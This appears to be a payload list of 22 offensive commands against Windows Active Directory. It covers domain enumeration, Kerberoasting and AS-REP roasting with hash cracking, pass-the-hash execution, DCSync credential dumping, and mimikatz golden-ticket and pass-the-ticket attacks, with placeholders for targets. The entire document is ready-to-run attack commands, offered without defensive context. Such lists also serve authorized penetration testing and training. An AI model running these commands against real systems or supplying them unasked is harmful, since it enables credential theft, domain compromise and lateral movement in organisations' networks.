Active Directory enumeration, Kerberoasting, AS-REP roasting, Pass-the-Hash, DCSync, Golden Ticket, and lateral movement techniques. (22 payloads)
net user /domain
net group "Domain Admins" /domain
nltest /dclist:<domain>
Get-ADUser -Filter * -Properties * | Select Name,SamAccountName,Enabled
Get-ADGroupMember "Domain Admins" | Select Name,SamAccountName
ldapsearch -H ldap://<DC_IP> -x -b "dc=domain,dc=com" "(objectClass=user)" sAMAccountName
bloodhound-python -u user -p pass -d domain.com -c All --zip
python3 GetUserSPNs.py domain.com/user:password -dc-ip <DC_IP> -request
Rubeus.exe kerberoast /outfile:hashes.txt
hashcat -m 13100 -a 0 hashes.txt rockyou.txt
python3 GetNPUsers.py domain.com/ -dc-ip <DC_IP> -usersfile users.txt -no-pass
Rubeus.exe asreproast /outfile:asrep_hashes.txt
hashcat -m 18200 -a 0 asrep_hashes.txt rockyou.txt
python3 psexec.py -hashes :NTLM_HASH domain/user@target
crackmapexec smb target -u user -H NTLM_HASH
python3 wmiexec.py -hashes :NTLM_HASH domain/user@target
python3 secretsdump.py domain/user:pass@<DC_IP>
mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:<SID> /krbtgt:<NTLM> /ptt
mimikatz # kerberos::ptt ticket.kirbi
Rubeus.exe ptt /ticket:<base64_ticket>
python3 getST.py -spn cifs/<target> -impersonate Administrator domain.com/user:pass